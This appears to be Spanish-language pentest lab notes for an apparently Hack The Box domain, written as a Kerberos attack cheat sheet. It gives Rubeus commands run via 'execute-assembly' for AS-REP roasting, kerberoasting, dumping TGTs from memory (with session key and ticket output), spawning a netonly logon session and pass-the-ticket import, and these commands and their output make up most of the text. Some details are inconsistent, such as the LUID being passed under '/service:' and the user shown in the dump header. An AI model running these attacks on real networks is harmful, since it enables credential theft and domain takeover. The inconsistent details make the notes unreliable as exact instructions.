Kerberos

Kerberos (AS-REP)

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:sqlsvc /nowrap

Kerberos (SPN)

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap

Kerberos Tickets

Los Kerberos tickets son credenciales digitales utilizadas para autenticar usuarios en una red. En lugar de enviar contraseñas, el sistema de Kerberos emite un TGT (Ticket Granting Ticket) cuando un usuario se autentica. Este TGT le permite obtener service tickets para acceder a recursos específicos sin tener que introducir su contraseña nuevamente. Cada ticket tiene una duración limitada para mejorar la seguridad.

Extract Kerberos Ticket

Es posible extraer ticket de kerberos directamente de la memoria si algun ticket existe. Podemos utilizar Rubeus para realizarlo.

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
Action: Triage Kerberos Tickets (All Users)

[*] Current LUID    : 0x56a09

 ----------------------------------------------------------------------------------- 
 | LUID     | UserName         | Service                   | EndTime               |
 ----------------------------------------------------------------------------------- 
 | 0xa901f  | DC01$ @ PAY.HTB  | krbtgt/PAY.HTB            | 2/27/2025 11:16:10 AM |
 | 0x11725b | DC01$ @ PAY.HTB  | ldap/DC01.PAY.HTB         | 2/27/2025 11:16:10 AM |
 | 0x56a09  | sqlsvc @ PAY.HTB | krbtgt/pay.htb            | 2/27/2025 5:19:27 PM  |
 -----------------------------------------------------------------------------------

Extraer kerberos ticket.

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /service:krbtgt /luid:0x56a09 /nowrap
[*] Target service  : krbtgt
[*] Target LUID     : 0x56a09
[*] Current LUID    : 0x56a09

  UserName                 : Administrator
  Domain                   : PAY
  LogonId                  : 0x56a09
  UserSID                  : S-1-5-21-2839822896-2191592306-2017040813-500
  AuthenticationPackage    : Kerberos
  LogonType                : Interactive
  LogonTime                : 2/27/2025 1:16:16 AM
  LogonServer              : DC01
  LogonServerDNSDomain     : PAY.HTB
  UserPrincipalName        : Administrator@PAY.HTB


    ServiceName              :  krbtgt/pay.htb
    ServiceRealm             :  PAY.HTB
    UserName                 :  sqlsvc (NT_PRINCIPAL)
    UserRealm                :  PAY.HTB
    StartTime                :  2/27/2025 7:19:27 AM
    EndTime                  :  2/27/2025 5:19:27 PM
    RenewTill                :  3/6/2025 7:19:27 AM
    Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType                  :  rc4_hmac
    Base64(key)              :  p+00GKftjtwU74EZQtMW3g==
    Base64EncodedTicket   :

      doIFODCCBTSgAwIBBaEDAgEWooIEXjCCBFphggRW...........

Creamos un proceso nuevo de tipo logon session (9).

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
[*] Action: Create Process (/netonly)


[*] Using random username and password.

[*] Showing process : False
[*] Username        : KG7VU7UW
[*] Domain          : PB2T3FGC
[*] Password        : GTHOXJHA
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 2328
[+] LUID            : 0x86bcff

Podemos importar en ticket en el nuevo proceso creado.

execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /service:0x86bcff /ticket:doIFODCCBTSgAwIBBaEDAg......
[*] Action: Import Ticket
[+] Ticket successfully imported!